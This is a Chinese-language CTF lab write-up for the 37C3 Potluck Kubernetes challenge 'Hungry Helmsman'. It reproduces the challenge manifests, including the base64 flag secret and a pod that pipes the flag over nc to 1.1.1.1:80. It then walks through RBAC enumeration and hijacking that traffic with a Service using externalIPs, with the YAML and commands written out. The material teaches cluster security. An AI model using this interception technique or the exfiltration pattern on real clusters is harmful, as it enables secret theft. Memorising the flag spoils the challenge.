Hungry Helmsman(37C3 Potluck CTF)

1. 环境部署

Kind 部署 1master 集群,

kind create cluster --image kindest/node:v1.23.4
docker pull busybox
kind load docker-image --name kind busybox:latest
kubectl apply -f challenge.yaml

Pasted image 20250418152040

#challenge.yaml

# create namespace flag-reciever
apiVersion: v1
kind: Namespace
metadata:
  name: flag-reciever
  labels:
    pod-security.kubernetes.io/enforce: "restricted"
---
# create namespace flag-sender
apiVersion: v1
kind: Namespace
metadata:
  name: flag-sender
---
# create sa ctf-player
apiVersion: v1
kind: ServiceAccount
metadata:
  name: ctf-player
---
# create flag secret
apiVersion: v1
kind: Secret
metadata:
  name: flag
  namespace: flag-sender
type: Opaque
data:
  flag: cG90bHVja3trdWJlcm5ldGVzX2Nhbl9iZV9hX2JpdF93ZWlyZH0=
---
# create flag-sender pod
apiVersion: apps/v1
kind: Deployment
metadata:
  name: flag-sender
  namespace: flag-sender
  labels:
    app: flag-sender
spec:
  replicas: 1
  selector:
    matchLabels:
      app: flag-sender
  template:
    metadata:
      labels:
        app: flag-sender
    spec:
      containers:
      - name: container
        image: docker.io/library/busybox:latest
        imagePullPolicy: IfNotPresent
        command:
        - sh
        args:
        - -c
        - while true; do echo $FLAG | nc 1.1.1.1 80 || continue; echo 'Flag Send'; sleep 10; done
        env:
        - name: FLAG
          valueFrom:
            secretKeyRef:
              name: flag
              key: flag
      restartPolicy: Always
      serviceAccountName: default
      dnsPolicy: ClusterFirst
      securityContext: {}
---
# create network policy
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: flag-reciever
  namespace: flag-reciever
spec:
  ingress:
  - from:
    - namespaceSelector:
        matchLabels:
          ns: flag-sender
      podSelector:
        matchLabels:
          app: flag-sender
  podSelector: {}
  policyTypes:
  - Ingress
  - Egress
---
# setup rbac
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: ctf-player
rules:
- apiGroups: [""]
  resources: ["namespaces"]
  verbs: ["list"]
- apiGroups: [""]
  resources: ["pods"]
  verbs: ["list"]
- apiGroups: [""]
  resources: ["services"]
  verbs: ["list"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: ctf-player
subjects:
- kind: ServiceAccount
  name: ctf-player
  namespace: default
roleRef:
  kind: ClusterRole
  name: ctf-player
  apiGroup: rbac.authorization.k8s.io
---
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  namespace: flag-reciever
  name: ctf-player
rules:
- apiGroups: [""]
  resources: ["pods.*"]
  verbs: ["create", "delete"]
- apiGroups: [""]
  resources: ["pods"]
  verbs: ["get", "create", "delete"]
- apiGroups: [""]
  resources: ["pods/log"]
  verbs: ["get"]
- apiGroups: [""]
  resources: ["services.*"]
  verbs: ["create", "delete"]
- apiGroups: [""]
  resources: ["services"]
  verbs: ["get", "create", "delete"]
- apiGroups: ["networking.k8s.io"]
  resources: ["networkpolicies"]
  verbs: ["list", "get"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: ctf-player
  namespace: flag-reciever
subjects:
- kind: ServiceAccount
  name: ctf-player
  namespace: default
roleRef:
  kind: Role
  name: ctf-player
  apiGroup: rbac.authorization.k8s.io
---
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  namespace: flag-sender
  name: ctf-player
rules:
- apiGroups: [""]
  resources: ["pods", "pods/log"]
  verbs: ["get"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: ctf-player
  namespace: flag-sender
subjects:
- kind: ServiceAccount
  name: ctf-player
  namespace: default
roleRef:
  kind: Role
  name: ctf-player
  apiGroup: rbac.authorization.k8s.io

创建一个CTF用户身份,

cat << EOF > kubeconfig-ctf-player.yaml
apiVersion: v1
clusters:
- cluster:
    insecure-skip-tls-verify: true
    server: $(kubectl config view --minify -o jsonpath='{.clusters[0].cluster.server}')
  name: ctf-cluster
contexts:
- context:
    cluster: ctf-cluster
    user: ctf-player
  name: ctf-cluster
current-context: ctf-cluster
kind: Config
preferences: {}
users:
- name: ctf-player
  user:
    token: $(kubectl create token ctf-player)
EOF

2. WP

2.1. 查看 defalut 命名空间下权限

kubectl --kubeconfig kubeconfig-ctf-player.yaml auth can-i --list

Pasted image 20250418152526
再看一下对kube-system命令空间下的角色
Pasted image 20250418152815
发现两个权限是一样的,那很可能我们当前这个角色(kubeconfig-ctf-player.yaml)是一个集群角色 权限A(集群role)

2.2. 查看其他命名空间

kubectl --kubeconfig kubeconfig-ctf-player.yaml get ns

Pasted image 20250418153024

2.3. 查看在其他命名空间的权限

kubectl --kubeconfig kubeconfig-ctf-player.yaml auth can-i --list -n flag-reciever

当前用户在 flag-reciever NS 中有较高的权限,权限B(限定 flag-reciever NS,是Role)
Pasted image 20250418153145

Hint

pods.*: 表示用户对 Pods 相关的所有资源有权限,包括创建、删除等。
pods: 表示用户对 Pods 这一具体资源有权限,但不涉及其他与 Pods 相关的资源。

在看下 对flag-sender命名空间的权限

kubectl --kubeconfig kubeconfig-ctf-player.yaml auth can-i --list -n flag-sender

当前用户在 flag-sender NS 中有以下权限,权限C(限定 flag-sender NS,是Role)
Pasted image 20250418153336

至此我们发现了当用户有三个角色权限

Note
  • 权限A:集群role
  • 权限B:限定 flag-reciever 命名空间 (有高危权限)
  • 权限C:限定 flag-sender 命名空间

2.4. 查看 Pod

#使用权限A(集群role)获取所以命名空间下的pod
kubectl --kubeconfig kubeconfig-ctf-player.yaml get pods -A

有一个可疑的 Pod
Pasted image 20250418153704

2.5. 分析pod

kubectl --kubeconfig kubeconfig-ctf-player.yaml -n flag-sender get pod flag-sender-854544d56f-njd6v -o yaml

Pasted image 20250418153953
其中 busybox 中 echo了 env 中的 FLAG,从secrets 资源里面获取。并且通过管道传递给了 1.1.1.1 80 端口,所以需要截获发往 1.1.1.1 80 端口的 flag,

Info

如果我们可以进入这个flag-sender-854544d56f-njd6vpod,就能拿到其中环境变量的FLAG了。
但是我们是对这个pod的命名空间权限很低Pasted image 20250418154408 只有get list权限,没有exec,所以我们进不去,这里我们就另想它法了

2.6. 思路1 ClusterIP

将集群中 IP 为 1.1.1.1 端口为 80 的流量转发到 busyboxtest 这个 Pod 的 8080 端口上,然后busyboxtest 内部监听 8080 端口,获取流量中的 flag,
需要创建 Service 和 Pod 的权限,我们在flag-reciever NS 中有这些较高的权限Pasted image 20250418155107

创建一个pod

kubectl --kubeconfig kubeconfig-ctf-player.yaml apply -f busybox-test.yaml
#busybox-test.yaml
apiVersion: v1
kind: Pod
metadata:
  creationTimestamp: null
  labels:
    run: busyboxtest
  name: busyboxtest
  namespace: flag-reciever
spec:
  securityContext:
    runAsNonRoot: true
    runAsUser: 1000
    seccompProfile:
      type: RuntimeDefault
  containers:
  - image: busybox
    name: busyboxtest
    args: [/bin/sh, -c, 'nc -lp 8080']
    ports:
    - containerPort: 8080
      name: http-web-svc
    securityContext:
      allowPrivilegeEscalation: false
      capabilities:
        drop:
        - ALL
    resources:
      limits:
        cpu: "100m"
        memory: "0Mi"
      requests:
        cpu: "100m"
        memory: "0Mi"
  dnsPolicy: ClusterFirst
  restartPolicy: Always
status: {}

创建service 配置流量转发

kubectl --kubeconfig kubeconfig-ctf-player.yaml -n flag-reciever apply -f service.yaml
#service.yaml
apiVersion: v1
kind: Service
metadata:
  name: my-custom-service
spec:
  type: ClusterIP
  clusterIP: 1.1.1.1  # 注意:通常应为 None 或自动分配
  ports: #端口转发 
    - port: 80
      targetPort: 8080
  selector:
    run: busyboxtest #通过标签与pod关联

但是报错了
Pasted image 20250418155949
这里原因是因为,我们设置的ip超出了集群ip 10.96.0.0/16 限制, 但是思路是正确的

创建成功后,借助我们对 flag-reciever 命名空间下的pod有 Pod/log 查看权限,即可在日志里面看到转发出来的flag Pasted image 20250418160230

2.7. 思路2 externalIPs

集群内部的ip我们设置不了,但可以设置外部的
通过使用 externalIPs 字段指定服务的外部 IP 地址,集群会将流量引导到指定的 IP 地址。

kubectl --kubeconfig kubeconfig-ctf-player.yaml apply -f service.yaml
#service.yaml
apiVersion: v1
kind: Service
metadata:
  name: my-custom-service
  namespace: flag-reciever #需要指定命名空间
spec:
  externalIPs: #使用externalIPs 替换集群IP
    - 1.1.1.1 #数组要使用这种格式  不能用 :IP
  ports:
    - port: 80
      targetPort: 8080
  selector:
    run: busyboxtest
Info

外部请求​:用户访问 http://1.1.1.1:80
​服务转发​:Service 将请求转发到标签为 run=busyboxtest 的 Pod
​Pod 处理​:Pod 内的应用程序在 8080 端口接收请求

#查看service资源
kubectl --kubeconfig kubeconfig-ctf-player.yaml get svc -A

Pasted image 20250418161516
配置好了service资源后,我们就可以查看流量转发目标端口pod的log

kubectl --kubeconfig kubeconfig-ctf-player.yaml -n flag-reciever logs busyboxtest

Pasted image 20250418161846

2.8. 流程思路

  1. 在 flag-sender-854544d56f-lsjcc Pod 内部,脚本通过 nc 命令将数据发送到 1.1.1.1:80
  2. 由于 Service 配置中指定了 externalIPs: [1.1.1.1],因此这个 IP 地址是 Service 的外部 IP
  3. Service 接收到来自 flag-sender-854544d56f-lsjcc Pod 的流量,并将其转发到具有标签 run:busyboxtest 的 Pod,也就是 busyboxtest。